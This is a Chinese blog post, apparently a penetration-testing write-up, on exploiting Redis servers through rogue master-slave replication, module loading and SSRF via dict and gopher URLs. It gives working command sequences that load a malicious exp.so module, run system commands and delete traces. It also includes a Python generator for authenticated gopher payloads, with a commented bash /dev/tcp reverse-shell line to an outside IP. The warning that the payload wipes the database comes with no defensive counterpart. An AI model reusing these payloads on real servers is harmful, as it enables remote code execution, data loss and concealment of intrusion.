<p><img src="https://img-blog.csdnimg.cn/dee89244c08c49a7b40d4cde2201c22e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"></p>
<p>那么怎么控制实现这些操作呢，其实很简单，我们可以监控一下正常流程，截取出相应的命令再进行构造好了，这些操作其实还是蛮复杂的，要不然也不要等Pavel Toporkov来公布了吧。</p>
<p>不过这个调试协议虽然繁琐但是还是可以做出来的。<br>跟一下wireshark走一遍流程就好了，站在巨人的肩膀也行。</p>
<p><a target="_blank" rel="noopener" href="https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf">https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf</a></p>
<h2 id="0x3-2-利用流程"><a href="#0x3-2-利用流程" class="headerlink" title="0x3.2 利用流程"></a>0x3.2 利用流程</h2><p>这里我比较推荐个比较好用的工具:</p>
<p>Dliv3师傅的比较适合实战:<a target="_blank" rel="noopener" href="https://github.com/Dliv3/redis-rogue-server">https://github.com/Dliv3/redis-rogue-server</a></p>
<pre class=" language-java"><code class="language-java">python3 redis<span class="token operator">-</span>rogue<span class="token operator">-</span>server<span class="token punctuation">.</span>py <span class="token operator">--</span>rhost <span class="token number">127.0</span><span class="token punctuation">.</span><span class="token number">0.1</span> <span class="token operator">--</span>rport <span class="token number">6380</span> <span class="token operator">--</span>lhost docker<span class="token punctuation">.</span><span class="token keyword">for</span><span class="token punctuation">.</span>mac<span class="token punctuation">.</span>host<span class="token punctuation">.</span>internal <span class="token operator">--</span>lport <span class="token number">8088</span>
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/6e82d31ed9fe409e9f2fb93c7d129147.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>可以看到效果还是有的。</p>
<p>这个工具还有个用法是,是服务器模式,接收目标redis的链接。</p>
<p>(这种场景可以使用在，服务器通外网，但是外网不能访问服务器时候，但是我们可以通过ssrf或者vpn之后链接redis来执行命令)</p>
<p>服务器端执行:</p>
<pre class=" language-java"><code class="language-java">python3 redis<span class="token operator">-</span>rogue<span class="token operator">-</span>server<span class="token punctuation">.</span>py <span class="token operator">--</span>server<span class="token operator">-</span>only
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/f41bc7ae59c348aeb76cca65b63013f8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>本地手工执行命令设置备份:</p>
<pre class=" language-java"><code class="language-java"><span class="token number">1</span><span class="token punctuation">.</span>config set dir <span class="token punctuation">.</span>/
<span class="token number">2</span><span class="token punctuation">.</span>config set dbfilename exp<span class="token punctuation">.</span>so
<span class="token number">3</span><span class="token punctuation">.</span>slaveof X<span class="token punctuation">.</span>X<span class="token punctuation">.</span>X<span class="token number">.195</span>
<span class="token number">4</span><span class="token punctuation">.</span>slaveof X<span class="token punctuation">.</span>X<span class="token punctuation">.</span>X<span class="token number">.195</span> <span class="token number">21000</span>  #上面看绑定的服务段端口是<span class="token number">21000</span>
<span class="token number">5</span><span class="token punctuation">.</span> module load <span class="token punctuation">.</span>/exp<span class="token punctuation">.</span>so
<span class="token number">6</span><span class="token punctuation">.</span>slaveof no one
<span class="token number">7</span><span class="token punctuation">.</span>system<span class="token punctuation">.</span>exec <span class="token string">'whoami'</span>

清理痕迹
<span class="token number">8</span><span class="token punctuation">.</span>config set dbfilename dump<span class="token punctuation">.</span>rdb
<span class="token number">9</span><span class="token punctuation">.</span>system<span class="token punctuation">.</span>exec <span class="token string">'rm ./exp.so'</span>
<span class="token number">10</span><span class="token punctuation">.</span>module unload system
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/d4b67d0cd0ce42748c6a8f08cf5e064f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>PS:(一些渗透需要注意的点)</p>
<p>经过测试,这个payload打的时候会重置所有数据库内容,所以慎用,在测试过程中，倒是没有遇到redis会崩溃的问题，可能是数据量比较少？</p>
<h2 id="0x3-3-可利用的版本"><a href="#0x3-3-可利用的版本" class="headerlink" title="0x3.3 可利用的版本"></a>0x3.3 可利用的版本</h2><p>经过测试主从复制的可利用版本是4.x-5.x，但是从6.0开始,就开始利用失败了。但是还是可以通过config命令来进行写文件的,也能通过主从复制来无损加载文件,但是在module的时候加载却失败了.</p>
<h2 id="0x3-4-禁用config命令绕过"><a href="#0x3-4-禁用config命令绕过" class="headerlink" title="0x3.4 禁用config命令绕过"></a>0x3.4 禁用config命令绕过</h2><p>如果在redis.conf 配置了禁用config命令的时候。</p>
<pre class=" language-java"><code class="language-java">rename<span class="token operator">-</span>command CONFIG <span class="token string">""</span>
</code></pre>
<p>比如这个config命令就不可用了，可以采取这种方式绕过。</p>
<p>这个时候我们就没办法自定义文件后缀了，但是我们还是可以利用主从复制的</p>
<p><img src="https://img-blog.csdnimg.cn/50f20257a6b347c28693146ee5161a93.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>可以看到同步之后exp.so的内容被保存为了dump.rdb</p>
<p><img src="https://img-blog.csdnimg.cn/575a43e4939845abab9a0a5a9a026e56.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>后面把dump.rdb当做exp.so去正常加载即可。</p>
<h2 id="0x4-SSRF对redis的利用"><a href="#0x4-SSRF对redis的利用" class="headerlink" title="0x4 SSRF对redis的利用"></a>0x4 SSRF对redis的利用</h2><p>SSRF为Redis的供给面打开了一个口子,但是由于dict和gopher协议的有一些坑点，有时候利用起来会出现一些下面的问题。</p>
<p>简单探测redis服务:</p>
<pre class=" language-java"><code class="language-java"><span class="token number">1</span><span class="token punctuation">.</span>curl <span class="token string">"dict://127.0.0.1:6381"</span>
<span class="token number">2</span><span class="token punctuation">.</span>回显
<span class="token operator">-</span>ERR Unknown subcommand or wrong number of arguments <span class="token keyword">for</span> <span class="token string">'libcurl'</span><span class="token punctuation">.</span> Try CLIENT HELP
<span class="token operator">+</span>OK
</code></pre>
<h2 id="0x4-1-dict与gopher协议的区别"><a href="#0x4-1-dict与gopher协议的区别" class="headerlink" title="0x4.1 dict与gopher协议的区别"></a>0x4.1 dict与gopher协议的区别</h2><p><strong>(1)dict协议</strong></p>
<p>dict协议，字典服务器协议， A Dictionary Server Protocol 。</p>
<p>dict是基于查询响应的TCP协议。</p>
<p><strong>使用格式:</strong></p>
<pre class=" language-java"><code class="language-java">dict<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span>serverip<span class="token operator">:</span>port<span class="token operator">/</span>命令<span class="token operator">:</span>参数
</code></pre>
<p>这里dict有个比较好的特点就是会再末尾补上\r\n</p>
<p>不好的是,命令多条的话，需要一条条地去执行,因为不支持传入换行,也不会对%0d%0解码</p>
<p><img src="https://img-blog.csdnimg.cn/29af9c0555e54ebb90c606c13627855b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br><strong>(2)gopher协议</strong></p>
<p>互联网上使用的分布型的文件搜集获取网络协议。</p>
<p>支持多行输入。</p>
<p>使用格式:</p>
<p>gopher://serverip:port/_data</p>
<p>特点:<br><img src="https://img-blog.csdnimg.cn/74c7248332ea43f8a940712b064e1140.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>可以看到gopher的第一个字符被吞掉了，还有没有发送quit</p>
<p>所以我们需要手动加一个字符如_</p>
<p>影响范围:</p>
<p><img src="https://img-blog.csdnimg.cn/f6cbef68381e420a9fdf78663da3b123.png" alt="在这里插入图片描述"></p>
<h2 id="0x4-2-无认证SSRF攻击"><a href="#0x4-2-无认证SSRF攻击" class="headerlink" title="0x4.2 无认证SSRF攻击"></a>0x4.2 无认证SSRF攻击</h2><p>dict协议的攻击:</p>
<pre class=" language-java"><code class="language-java"><span class="token number">1</span><span class="token punctuation">.</span>连接远程主服务器
curl dict<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">127.0</span><span class="token punctuation">.</span><span class="token number">0.1</span><span class="token operator">:</span><span class="token number">6381</span><span class="token operator">/</span>slaveof<span class="token operator">:</span><span class="token number">101.200</span><span class="token punctuation">.</span><span class="token number">157.195</span><span class="token operator">:</span><span class="token number">21000</span>
<span class="token number">2</span><span class="token punctuation">.</span>设置保存文件名
curl dict<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">127.0</span><span class="token punctuation">.</span><span class="token number">0.1</span><span class="token operator">:</span><span class="token number">6381</span><span class="token operator">/</span>config<span class="token operator">:</span>set<span class="token operator">:</span>dbfilename<span class="token operator">:</span>exp<span class="token punctuation">.</span>so
<span class="token number">3</span><span class="token punctuation">.</span>载入 exp<span class="token punctuation">.</span>so
curl dict<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">127.0</span><span class="token punctuation">.</span><span class="token number">0.1</span><span class="token operator">:</span><span class="token number">6381</span><span class="token operator">/</span>module<span class="token operator">:</span>load<span class="token operator">:</span><span class="token punctuation">.</span>/exp<span class="token punctuation">.</span>so
<span class="token number">4</span><span class="token punctuation">.</span>断开主从
curl dict<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">127.0</span><span class="token punctuation">.</span><span class="token number">0.1</span><span class="token operator">:</span><span class="token number">6381</span><span class="token operator">/</span>slaveof<span class="token operator">:</span>no<span class="token operator">:</span>one
<span class="token number">5</span><span class="token punctuation">.</span>恢复原始文件名
curl dict<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">127.0</span><span class="token punctuation">.</span><span class="token number">0.1</span><span class="token operator">:</span><span class="token number">6381</span><span class="token operator">/</span>config<span class="token operator">:</span>set<span class="token operator">:</span>dbfilename<span class="token operator">:</span>dump<span class="token punctuation">.</span>rdb
<span class="token number">6</span><span class="token punctuation">.</span>执行命令
curl dict<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">127.0</span><span class="token punctuation">.</span><span class="token number">0.1</span><span class="token operator">:</span><span class="token number">6381</span><span class="token operator">/</span>system<span class="token punctuation">.</span>exec<span class="token operator">:</span><span class="token string">'whomai'</span>
<span class="token number">7</span><span class="token punctuation">.</span>删除痕迹
curl dict<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">127.0</span><span class="token punctuation">.</span><span class="token number">0.1</span><span class="token operator">:</span><span class="token number">6381</span><span class="token operator">/</span>system<span class="token punctuation">.</span>exec<span class="token operator">:</span>rm <span class="token string">'./exp.so'</span>
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/2b4bad584bfe4d54938799cb3446a57a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>成功执行命令。</p>
<p>要是写shell的话参照上面那样做即可。</p>
<p>gopher协议的攻击:</p>
<p>这里采取goherus.py,来实现快速利用吧。</p>
<pre class=" language-java"><code class="language-java"><span class="token number">1</span><span class="token punctuation">.</span>git clone https<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span>github<span class="token punctuation">.</span>com<span class="token operator">/</span>tarunkant<span class="token operator">/</span>Gopherus<span class="token punctuation">.</span>git
<span class="token number">2</span><span class="token punctuation">.</span>gopherus <span class="token operator">--</span>exploit redis
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/9575ef6a78d74b6e8cb30961f9fc9395.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>Gopherus没有集成怎么主从复制的利用。简单分析下他的原理</p>
<p><img src="https://img-blog.csdnimg.cn/5d429f219e4e469fa2a66a17027456cd.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>可以看到这个伪造的是resp协议来交互(这个不打算展开,后面源码分析利用的时候会说明的)</p>
<p>其实这里我们也可以将gopher伪造成dict的协议(直接采用简单协议格式)来一段一段地请求。</p>
<pre class=" language-java"><code class="language-java">gopher<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">127.0</span><span class="token punctuation">.</span><span class="token number">0.1</span><span class="token operator">:</span><span class="token number">6379</span><span class="token operator">/</span>_auth<span class="token operator">%</span><span class="token number">20123123</span><span class="token operator">%</span><span class="token number">0d</span><span class="token operator">%</span>0aconfig<span class="token operator">%</span>20set<span class="token operator">%</span>20dir<span class="token operator">%</span><span class="token number">20</span><span class="token operator">/</span>tmp<span class="token operator">/</span><span class="token operator">%</span><span class="token number">0d</span><span class="token operator">%</span>0aquit
</code></pre>
<p>只要在最后加上个quit即可,这样子的好处是,有缓冲时间，一段段发送可以让备份文件完整传输到从机上的时间。</p>
<h2 id="0x4-3-带认证的SSRF攻击"><a href="#0x4-3-带认证的SSRF攻击" class="headerlink" title="0x4.3 带认证的SSRF攻击"></a>0x4.3 带认证的SSRF攻击</h2><p>有认证的话,其实问题也不大。</p>
<p>auth 123123</p>
<p>docker里面用tcpdump监听协议包</p>
<pre class=" language-java"><code class="language-java">tcpdump <span class="token operator">-</span>i eth0 port <span class="token number">6379</span> <span class="token operator">-</span>w redisPort<span class="token punctuation">.</span>pcap
</code></pre>
<p>然后导出到本机用wireshark分析</p>
<pre class=" language-java"><code class="language-java">docker cp cbdaed8<span class="token operator">:</span><span class="token operator">/</span>redisPort<span class="token punctuation">.</span>pcap <span class="token punctuation">.</span>/redisPort<span class="token punctuation">.</span>pcap
</code></pre>
<p>直接follow tcp stream</p>
<p><img src="https://img-blog.csdnimg.cn/bd22244fbd6e41f2baca2acb43f53ac0.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>可以看到这个验证过程其实也是可以伪造的。</p>
<p><img src="https://img-blog.csdnimg.cn/fa42033da39f481a88b102972a77f010.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>提取这段出来然后url编码就行了</p>
<pre class=" language-java"><code class="language-java"><span class="token keyword">import</span> urllib<span class="token punctuation">.</span>parse
str_ <span class="token operator">=</span> <span class="token string">"2a 32 0d 0a 24 34 0d 0a 61 75 74 68 0d 0a 24 36 0d 0a 31 32 33 31 32 33  0d 0a"</span>
str__ <span class="token operator">=</span> str_<span class="token punctuation">.</span><span class="token function">split</span><span class="token punctuation">(</span><span class="token string">' '</span><span class="token punctuation">)</span>
okStr <span class="token operator">=</span> <span class="token string">""</span>
<span class="token keyword">for</span> i in str__<span class="token operator">:</span>
    okStr <span class="token operator">+=</span> <span class="token string">"%"</span> <span class="token operator">+</span>i
<span class="token function">print</span><span class="token punctuation">(</span>okStr<span class="token punctuation">)</span>
</code></pre>
<p>然后测试下:</p>
<pre class=" language-java"><code class="language-java">curl <span class="token string">"gopher://127.0.0.1:6383/_%2a%32%0d%0a%24%34%0d%0a%61%75%74%68%0d%0a%24%36%0d%0a%31%32%33%31%32%33%%0d%0a"</span>
<span class="token operator">+</span>OK
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/e37b2b4526b04e3fa2c0b0f08af396db.png" alt="在这里插入图片描述"><br>Redis支持管道流水线，所以可以一次性拼接命令发送，不需要回复请求。</p>
<p>所以我们只需要在开头拼接下这段验证就行了。</p>
<h2 id="0x4-4-通用利用脚本"><a href="#0x4-4-通用利用脚本" class="headerlink" title="0x4.4 通用利用脚本"></a>0x4.4 通用利用脚本</h2><p>这里我自己改了个比较简单的python3的payload生成脚本。</p>
<pre class=" language-python"><code class="language-python"><span class="token comment" spellcheck="true">#!/usr/bin/python3</span>
<span class="token comment" spellcheck="true"># -*-coding:utf-8-*-</span>
<span class="token comment" spellcheck="true"># author:xq17</span>

<span class="token keyword">import</span> urllib<span class="token punctuation">.</span>parse

<span class="token keyword">def</span> <span class="token function">tranToResp</span><span class="token punctuation">(</span>x<span class="token punctuation">)</span><span class="token punctuation">:</span>
        xSplit <span class="token operator">=</span> x<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">" "</span><span class="token punctuation">)</span>
        cmd<span class="token operator">=</span><span class="token string">""</span>
        cmd<span class="token operator">+=</span><span class="token string">"*"</span><span class="token operator">+</span>str<span class="token punctuation">(</span>len<span class="token punctuation">(</span>xSplit<span class="token punctuation">)</span><span class="token punctuation">)</span>
        <span class="token keyword">for</span> i <span class="token keyword">in</span> xSplit<span class="token punctuation">:</span>
            i <span class="token operator">=</span> i<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">"${IFS}"</span><span class="token punctuation">,</span><span class="token string">" "</span><span class="token punctuation">)</span>
            cmd<span class="token operator">+=</span><span class="token string">"\r\n"</span><span class="token operator">+</span><span class="token string">"$"</span><span class="token operator">+</span>str<span class="token punctuation">(</span>len<span class="token punctuation">(</span>i<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token operator">+</span><span class="token string">"\r\n"</span><span class="token operator">+</span> i
        cmd<span class="token operator">+=</span><span class="token string">"\r\n"</span>
        <span class="token keyword">return</span> cmd

<span class="token keyword">def</span> <span class="token function">GeneratePayload</span><span class="token punctuation">(</span>ip<span class="token punctuation">,</span> port<span class="token punctuation">)</span><span class="token punctuation">:</span>
    cmd<span class="token operator">=</span><span class="token punctuation">[</span>
     <span class="token string">"config set dir ./"</span><span class="token punctuation">,</span>
     <span class="token string">"config set dbfilename exp.so"</span><span class="token punctuation">,</span>
     <span class="token string">"slaveof {i} {p}"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>i<span class="token operator">=</span>ip<span class="token punctuation">,</span> p<span class="token operator">=</span>port<span class="token punctuation">)</span><span class="token punctuation">,</span>
     <span class="token string">"module load exp.so"</span><span class="token punctuation">,</span>
     <span class="token string">"system.exec ls"</span><span class="token punctuation">,</span>
     <span class="token string">"system.exec rm${IFS}exp.so"</span><span class="token punctuation">,</span>
     <span class="token string">"quit"</span><span class="token punctuation">,</span>
     <span class="token punctuation">]</span>
     <span class="token comment" spellcheck="true"># "system.exec bash${IFS}-i${IFS}>&amp;${IFS}/dev/tcp/192.168.8.103/4607${IFS}0>&amp;1",</span>
    payload <span class="token operator">=</span> <span class="token string">""</span>
    <span class="token keyword">for</span> p <span class="token keyword">in</span> cmd<span class="token punctuation">:</span>
        payload <span class="token operator">+=</span> urllib<span class="token punctuation">.</span>parse<span class="token punctuation">.</span>quote<span class="token punctuation">(</span>tranToResp<span class="token punctuation">(</span>p<span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">return</span> payload


<span class="token keyword">def</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token comment" spellcheck="true"># target</span>
    ip <span class="token operator">=</span> <span class="token string">"127.0.0.1"</span>
    port <span class="token operator">=</span> <span class="token string">"6383"</span>
    <span class="token comment" spellcheck="true"># server load exp.so</span>
    serverIp <span class="token operator">=</span> <span class="token string">"101.x.x.x"</span>
    serverPort <span class="token operator">=</span> <span class="token string">"21000"</span>
    authPass <span class="token operator">=</span> <span class="token string">"123123"</span>
    payload <span class="token operator">=</span> GeneratePayload<span class="token punctuation">(</span>serverIp<span class="token punctuation">,</span> serverPort<span class="token punctuation">)</span>
    exitPayload <span class="token operator">=</span> <span class="token punctuation">(</span>urllib<span class="token punctuation">.</span>parse<span class="token punctuation">.</span>quote<span class="token punctuation">(</span>tranToResp<span class="token punctuation">(</span><span class="token string">"slaveof no one"</span><span class="token punctuation">)</span> <span class="token operator">+</span> tranToResp<span class="token punctuation">(</span><span class="token string">"quit"</span><span class="token punctuation">)</span> <span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">if</span> authPass<span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"author attack:"</span><span class="token punctuation">)</span>
        pd <span class="token operator">=</span> <span class="token string">"gopher://{host}:{port}/_%2a%32%0d%0a%24%34%0d%0a%61%75%74%68%0d%0a%24{l}%0d%0a{p}%0d%0a"</span>
        pd <span class="token operator">=</span> pd<span class="token punctuation">.</span>format<span class="token punctuation">(</span>host<span class="token operator">=</span>ip<span class="token punctuation">,</span> port<span class="token operator">=</span>port<span class="token punctuation">,</span> l<span class="token operator">=</span>str<span class="token punctuation">(</span>len<span class="token punctuation">(</span>authPass<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span> p<span class="token operator">=</span>authPass<span class="token punctuation">)</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span>pd <span class="token operator">+</span> payload<span class="token punctuation">)</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"clean footprint:"</span><span class="token punctuation">)</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span>pd <span class="token operator">+</span> exitPayload<span class="token punctuation">)</span>
    <span class="token keyword">else</span><span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"no author attack:"</span><span class="token punctuation">)</span>
        pd <span class="token operator">=</span> <span class="token string">"gopher://{host}:{port}/_"</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span>pd<span class="token punctuation">.</span>format<span class="token punctuation">(</span>host<span class="token operator">=</span>ip<span class="token punctuation">,</span> port<span class="token operator">=</span>port<span class="token punctuation">)</span><span class="token operator">+</span>payload<span class="token punctuation">)</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"clean footprint:"</span><span class="token punctuation">)</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span>pd<span class="token punctuation">.</span>format<span class="token punctuation">(</span>host<span class="token operator">=</span>ip<span class="token punctuation">,</span> port<span class="token operator">=</span>port<span class="token punctuation">)</span> <span class="token operator">+</span> exitPayload<span class="token punctuation">)</span>

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">'__main__'</span><span class="token punctuation">:</span>
    main<span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/448591b9a753482d828386496035d304.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>如果有认证的话,添加到authPass变量即可。</p>
<h2 id="0x4-5-redis触发反序列化"><a href="#0x4-5-redis触发反序列化" class="headerlink" title="0x4.5 redis触发反序列化"></a>0x4.5 redis触发反序列化</h2><p>这种场景主要是redis里面存储的内容，最终会被程序反序列化，从而导致触发处反序列化漏洞。</p>
<p>我们平时做题目的时候一般序列化内容都被base64了，所以没遇到什么坑。但是如果是原生的序列化数据就会有协议无法传输特殊字符的坑。</p>
<p>不过gopher是无敌的，双重编码就行了。</p>
<p>案例来源: <a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/kfYF157ux_VAOymU5l5RFA">https://mp.weixin.qq.com/s/kfYF157ux_VAOymU5l5RFA</a></p>
<p>以后如果遇到有意思的题目，单独列出来这个方面研究吧,gopher协议足够秒杀了。</p>
<h2 id="0x5-总结"><a href="#0x5-总结" class="headerlink" title="0x5 总结"></a>0x5 总结</h2><p>  本文主要是归纳了一些tips偏应用方面,前前后后折腾了挺久的,感觉网上的知识点都比较零散,现在很多人都止步了对redis的漏洞挖掘，除非新爆出一些什么洞，否则，目前的文章体系还是能系统涵盖已知的主要攻击面。也欢迎各位师傅提出一些新的点，让我加强学习。后面将从redis的源码来分析一些现象的原因。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">wa1ki0g</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://example.com/2022/02/24/redis%E6%94%BB%E5%87%BB%E6%80%BB%E7%BB%93/">http://example.com/2022/02/24/redis%E6%94%BB%E5%87%BB%E6%80%BB%E7%BB%93/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">wa1ki0g</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            <span class="chip bg-color">无标签</span>
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
